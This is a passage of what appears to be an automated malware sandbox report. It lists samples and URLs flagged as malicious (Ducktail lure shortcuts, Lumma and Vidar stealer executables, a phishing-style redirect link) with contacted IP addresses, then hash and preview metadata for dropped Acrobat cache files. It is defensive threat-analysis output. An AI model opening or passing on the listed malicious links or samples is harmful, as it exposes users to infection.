                                                                                                      28a2c9bd18a11de089ef85a160da29e4kingsmaker.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      https://sandisk2.oss-ap-northeast-2.aliyuncs.comGet hashmaliciousUnknownBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      Emloyment Form.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      Emloyment Form.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      https://www.filemail.com/d/dolcahmytquddazGet hashmaliciousUnknownBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      https://www.google.rs/url?q=902CHARtTPSJ3J3wDyycT&sa=t&esrc=uoVoZFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/burakyaman.co.uk%2FNew%2FAuth%2FxLOTspdcp8PiM3iiATiEg23p/amJ1cm8xMEBlcS5lZHUuYXUGet hashmaliciousUnknownBrowse
                                                                                                      • 20.109.210.53
                                                                                                      • 13.107.246.63
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ekingsmaker.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Emloyment Form.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Emloyment Form.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Company Booklet.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Company Booklet.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                      • 104.21.75.170
                                                                                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.75.170
                                                                                                      rPO49120.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.75.170
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\Windows\Temp\svczHost.exekingsmaker.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                        kingsmaker_6.ca.ps1Get hashmaliciousDucktailBrowse
                                                                                                          Emloyment Form.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                            Job Description.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                              Emloyment Form.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                Company Booklet.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                  Company Booklet.lnk (2).download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                    Job Description.lnk.download.lnkGet hashmaliciousDucktailBrowse
                                                                                                                      Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                        Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.8307419165235876
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugD:gJjJGtpTq2yv1AuNZRY3diu8iBVqFR
                                                                                                                          MD5:52FB64D69694AE69FF18759E99C470DA
                                                                                                                          SHA1:98A62CEB0DDEBAB9AAA00A683DD3582634B9271E
                                                                                                                          SHA-256:627057A6659958486288C735A1925271ACB4E8FCEFAC849A8063480C3AC49A34
                                                                                                                          SHA-512:BB14908FD7A94DE0CFF0F15445539BABBF3AD64CD408F51037F63450B17230BA4704961DC56B5579117F2177FBDD2233C049B574553362F9955813E32F63695E
                                                                                                                          Malicious:false
                                                                                                                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9133ac68, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.6586246994927177
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:BSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Baza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                          MD5:A10753FE3C32F392C79296A15A3CAC81
                                                                                                                          SHA1:663EEF66E36C0A130A6E73EB1C4592C2D9DD78C8
                                                                                                                          SHA-256:9C2873F2C3479A2BEFEEFAF0C2A44A3CD2E08911AB81799E733C3448E6FE7E68
                                                                                                                          SHA-512:4B622EB757712DB18BAE86DB5748193F2AFF95B7744CF96987A2C4101A0769B7912520958F0379AF455EA9BED35B3F94AFE9C74057ED60027957EAABBFDCA417
                                                                                                                          Malicious:false
                                                                                                                          Preview:.3.h... ...............X\...;...{......................0.z..........{..*....|G.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................$.N+....|....................N.*....|g..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.08082104402670427
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:K2l8Ye4m4WCrbEkGuAJkhvekl1GPWZCr//AllrekGltll/SPj:K2l8zCRzrxlYxXAJe3l
                                                                                                                          MD5:BDB1BE544BA4A95F2E7249BABE61D836
                                                                                                                          SHA1:2213885F7A56256A405C1BA8667D0BACF7AA6ABB
                                                                                                                          SHA-256:86E76F9F06FE7664C3D444B041C9DD36E5BBB192DD08E3C9677089F772680E1D
                                                                                                                          SHA-512:581999ACCA1D6E461709166F1DED34A53CA37D922A9D1A77E80A9D704178B90AC1D2C0A3618CC440624A49BD7E34BD3F41BB7A29D6B6C6EA1FC3B333C6962D9D
                                                                                                                          Malicious:false
                                                                                                                          Preview:n.d......................................;...{..*....|g......{...............{.......{...XL......{....................N.*....|g.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):294
                                                                                                                          Entropy (8bit):5.188180365425627
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HMTbFgOq2P92nKuAl9OmbnIFUt8YMTbRsZmw+YMTbRMkwO92nKuAl9OmbjLJ:sTbGOv4HAahFUt83Tbq/+3TbW5LHAaSJ
                                                                                                                          MD5:4C0CCCC577FBCDBE64D9BF0531C1D5B0
                                                                                                                          SHA1:DDA82D9E71F838C2BB221E6B1E678968C9030D2B
                                                                                                                          SHA-256:29C199B2A91D7F7CB4848930FAA5C8AF4F085EF64CDB18B2D34F5CEF4F2F2C64
                                                                                                                          SHA-512:AFA15A85A1B5778254E3C5627F29A41698EA54F2EF646DBB6D5BB774C23B07DC35A3A032C264E6A48E136E2A55B1D5442277D9B7102C5215C6E1E99283C9B194
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/29-02:30:42.514 1d80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/29-02:30:42.518 1d80 Recovering log #3.2024/11/29-02:30:42.518 1d80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):294
                                                                                                                          Entropy (8bit):5.188180365425627
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HMTbFgOq2P92nKuAl9OmbnIFUt8YMTbRsZmw+YMTbRMkwO92nKuAl9OmbjLJ:sTbGOv4HAahFUt83Tbq/+3TbW5LHAaSJ
                                                                                                                          MD5:4C0CCCC577FBCDBE64D9BF0531C1D5B0
                                                                                                                          SHA1:DDA82D9E71F838C2BB221E6B1E678968C9030D2B
                                                                                                                          SHA-256:29C199B2A91D7F7CB4848930FAA5C8AF4F085EF64CDB18B2D34F5CEF4F2F2C64
                                                                                                                          SHA-512:AFA15A85A1B5778254E3C5627F29A41698EA54F2EF646DBB6D5BB774C23B07DC35A3A032C264E6A48E136E2A55B1D5442277D9B7102C5215C6E1E99283C9B194
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/29-02:30:42.514 1d80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/29-02:30:42.518 1d80 Recovering log #3.2024/11/29-02:30:42.518 1d80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):338
                                                                                                                          Entropy (8bit):5.192218468846245
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HMTbM9yq2P92nKuAl9Ombzo2jMGIFUt8YMTbLyz1Zmw+YMTbLylRkwO92nKuAl97:sTbAyv4HAa8uFUt83TbLyZ/+3TbLylRK
                                                                                                                          MD5:8762A9E8E71A398034F165C7FB279DD4
                                                                                                                          SHA1:A473071530ECF84EAA6D88E60ECF268FE3FC5C0D
                                                                                                                          SHA-256:721B0B00DE1156BC00CA39770A05DAFA92CAA07364F8F24E482EC22304BF7CAD
                                                                                                                          SHA-512:5124F1E36B015A8660C110D635266FD05D0087254A2B2B157429CBC3A6279DC389FC7A8C47CC174C00ACFAABE2C7089AA01A8E36A69A20A9D7092A51D0247FEF
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/29-02:30:42.596 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/29-02:30:42.598 1e70 Recovering log #3.2024/11/29-02:30:42.598 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):338
                                                                                                                          Entropy (8bit):5.192218468846245
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HMTbM9yq2P92nKuAl9Ombzo2jMGIFUt8YMTbLyz1Zmw+YMTbLylRkwO92nKuAl97:sTbAyv4HAa8uFUt83TbLyZ/+3TbLylRK
                                                                                                                          MD5:8762A9E8E71A398034F165C7FB279DD4
                                                                                                                          SHA1:A473071530ECF84EAA6D88E60ECF268FE3FC5C0D
                                                                                                                          SHA-256:721B0B00DE1156BC00CA39770A05DAFA92CAA07364F8F24E482EC22304BF7CAD
                                                                                                                          SHA-512:5124F1E36B015A8660C110D635266FD05D0087254A2B2B157429CBC3A6279DC389FC7A8C47CC174C00ACFAABE2C7089AA01A8E36A69A20A9D7092A51D0247FEF
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/29-02:30:42.596 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/29-02:30:42.598 1e70 Recovering log #3.2024/11/29-02:30:42.598 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):508
                                                                                                                          Entropy (8bit):5.047195090775108
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                          MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                          SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                          SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                          SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):508
                                                                                                                          Entropy (8bit):5.047195090775108
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                          MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                          SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                          SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                          SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):508
                                                                                                                          Entropy (8bit):5.047195090775108
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                          MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                          SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                          SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                          SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):508
                                                                                                                          Entropy (8bit):5.0501670888151216
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YH/um3RA8sq2Qi4hsBdOg2H1caq3QYiubxnP7E4TfF+:Y2sRdsFQUdMH03QYhbxP7np+
                                                                                                                          MD5:5896DC57CFF0012F97BC65F889BF7BAC
                                                                                                                          SHA1:014BD21D9C22E83AAAA8865B2FB50D0A0B993D5A
                                                                                                                          SHA-256:F2B3B0BB6D966A32FEC2D2944D769E9C1F8E9131306D03879B8CE8380FA2C4DD
                                                                                                                          SHA-512:D9D4DF1B80E1D451E49E47A6FA741846D8DD4F72F928D70CAC17B3F5DEE7E2B5BADE7EFEEE8393B285892775519EF1F965B0358F0EB4EC420BEF02F15B4D026C
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377425454274874","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":571998},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4099
                                                                                                                          Entropy (8bit):5.2373796700540485
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUPepzU:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNL6
                                                                                                                          MD5:798C1BA8E8BD47D3DD62A59FA05F43A1
                                                                                                                          SHA1:389C8593F14CEACA7E9C27DFAEC9E01348D62207
                                                                                                                          SHA-256:45DB1EC4F7C1C4A3CF875B23C10AB0CE8AF646ED33288293404F9476001FB598
                                                                                                                          SHA-512:10FBC912B4967F515BEE578F1185DD9E0379DF4EE379D4CD5A2FA8FAFF2AEB192A826170C314C32B0EB79C3473B42255196B732B6623A873561DFB403CE19015
                                                                                                                          Malicious:false
                                                                                                                          Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):326
                                                                                                                          Entropy (8bit):5.187783079065188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HMTb8Flyq2P92nKuAl9OmbzNMxIFUt8YMTR31Zmw+YMTR5gRkwO92nKuAl9OmbzE:sTb8jyv4HAa8jFUt83TRF/+3TR5gR5Lv
                                                                                                                          MD5:78D338D520BE7F9D780A2911B6AC54A7
                                                                                                                          SHA1:DEC18EE0EB16C1D290BE4A527809068042426C53
                                                                                                                          SHA-256:F53C4ECD6CF641249DB232A7C84DDA832DE773A8E5276D4A78225E1473893EAF
                                                                                                                          SHA-512:83DA0C51CD8753608C1DB7C6C219E824AF597E52C9E37EDA6D8EBCE0C39DDB99E75E4B83493BCA0F92759BC3CA1B101FE3492758C91AA179F4A8AB8F66A2D202
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/29-02:30:42.981 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/29-02:30:43.574 1e70 Recovering log #3.2024/11/29-02:30:43.575 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):326
                                                                                                                          Entropy (8bit):5.187783079065188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HMTb8Flyq2P92nKuAl9OmbzNMxIFUt8YMTR31Zmw+YMTR5gRkwO92nKuAl9OmbzE:sTb8jyv4HAa8jFUt83TRF/+3TR5gR5Lv
                                                                                                                          MD5:78D338D520BE7F9D780A2911B6AC54A7
                                                                                                                          SHA1:DEC18EE0EB16C1D290BE4A527809068042426C53
                                                                                                                          SHA-256:F53C4ECD6CF641249DB232A7C84DDA832DE773A8E5276D4A78225E1473893EAF
                                                                                                                          SHA-512:83DA0C51CD8753608C1DB7C6C219E824AF597E52C9E37EDA6D8EBCE0C39DDB99E75E4B83493BCA0F92759BC3CA1B101FE3492758C91AA179F4A8AB8F66A2D202
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/29-02:30:42.981 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/29-02:30:43.574 1e70 Recovering log #3.2024/11/29-02:30:43.575 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:Certificate, Version=3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1391
                                                                                                                          Entropy (8bit):7.705940075877404
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                          Malicious:false
                                                                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):192
                                                                                                                          Entropy (8bit):2.766862344522533
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:kkFklESz/XfllXlE/HT8kplJtNNX8RolJuRdxLlGB9lQRYwpDdt:kKdSz/IT8GTNMa8RdWBwRd
                                                                                                                          MD5:7321CB3F812CFF8912BFC6E654DD55A4
                                                                                                                          SHA1:EE4951EE2AEE60519B69F43C4233CA949DAC5574
                                                                                                                          SHA-256:ED88B7D724409243B551E700ADCD7C979336668FBA712A07869E05C6506A2412
                                                                                                                          SHA-512:9A9BAF57AC77C826D23EB271A084A958775B281DF83CE7566696CC6BD7BCAAFBA13DF23BF34FE9D5B1775B7C6C6AB132B5BD508FEACAA8F69DC36F4594FD509F
                                                                                                                          Malicious:false
                                                                                                                          Preview:p...... ........w..0B..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):295
                                                                                                                          Entropy (8bit):5.315814218155521
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJM3g98kUwPeUkwRe9:YvXKXKvknUYpW74TTGMbLUkee9
                                                                                                                          MD5:9F90F1E0732ECF3D05F4B10CE48C0A82
                                                                                                                          SHA1:B9AB2E1A41524986981A864CFCAD91FC71C63B49
                                                                                                                          SHA-256:3B7FCA6AE36C2CBDEBFB7B83B1122CA3A91C244DB368F56950D02D8708E20182
                                                                                                                          SHA-512:CBD65CADBC28B1458930FB143C87D85D594460DEE1D9D46B70EDC122F56B428D3E738B464E243A293B58A9CBCEF96875532FA00850C611FB1B78348F9AFC502B
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):294
                                                                                                                          Entropy (8bit):5.2556777946014
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJfBoTfXpnrPeUkwRe9:YvXKXKvknUYpW74TTGWTfXcUkee9
                                                                                                                          MD5:D1B576354BC00B27E946BD6AAC740DFE
